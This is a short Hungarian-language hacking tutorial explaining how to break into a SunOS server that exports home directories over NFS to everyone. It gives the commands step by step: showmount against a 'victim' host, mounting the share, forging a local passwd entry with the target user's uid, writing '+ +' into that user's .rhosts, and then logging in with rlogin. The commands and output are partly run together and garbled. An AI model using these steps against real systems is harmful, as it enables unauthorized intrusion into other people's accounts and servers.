Hogyan tudunk konnyen es egyszeruen bejutni egy SunOs szerverre

Hogyan tudunk konnyen es egyszeruen bejutni egy SunOs szerverre, felteve ha megfeleloek az adottsagok?

Feltetel : Linux server , ahol lehetoleg root vagy ,
RPC program a celszerveren.

mysite:~/usr/sbin/showmount -e victim.site.com
Ezzel a parancssorral kiirja a celszerveren levo export konyvtarakat , es
megmutatja ki altal lathato ez. Ha (everyone) akkor makod van.

Ha viszont a parancssor beirasa utan ezt irja ki :

RPC: Program not registered.
Akkor ezzel a programmal ne probalkozz , igy nem tudsz ide bejutni :).

Szoval mi is tortenik , ha megvannak a feltetelek:

mysite:~/usr/sbin/showmount -e victim1.site.com/usr victim2.site.com/home (everyone) -a /home konyvtarat barki lathatja:)/cdrom (everyone) mysite:~mkdir /tmp/mountmysite:~/bin/mount -nt nfs victim1.site.com:/home /tmp/mount/ -be kell
mountolni a konyvtarat

mysite:~ls -sal /tmp/mount total 9 1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./ 1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../ 1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/ 1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/ 1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/ 1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/ 1 -rw------- 1 root root 242 Mar 9 1997 sudoers 1 drwx------ 3 test 100 1024 Oct 8 21:05 test/ 1 drwx------ 15 102 100 1024 Oct 20 18:57 rapper/
Megjegyezendo , hogy mountolni altalaban csak root jogokkal lehet!
Tehat :

mysite:~iduid=0 euid=0mysite:~whoamirootmysite:~echo "rapper::102:2::/tmp/mount:/bin/csh" /etc/passwd
Mit is csinaltunk most?
-
Az ls -sal paranccsal megelestuk a /tmp/mount konyvtarunkban levo
bemountolt home konyvtarban levo dolgokat.
Itt talaltunk egy rapper usert , akinek 102 az uid-je.
Ezek utan hozzafuzunk egy sort a passwd file-unkhoz /ROOT JOG!!/
amibe behelyezzuk a user nevet es a uid-jet.

mysite:~su - rapperWelcome to rapper's user.
-
Ezek utan siman su paranccsal belephetunk az aldozat user nevere.

mysite:~echo "+ +" rapper/.rhosts
-
Letrehozunk egy .rhosts nevu filet,amihez hozzarakunk 2 + +(az rloginhoz szükseges)

mysite:~cd /mysite:~rlogin victim1.site.comWelcome to Victim.Site.Com.SunOs ver....(crap).victim1:~$- rloginnal szepen belepunk :)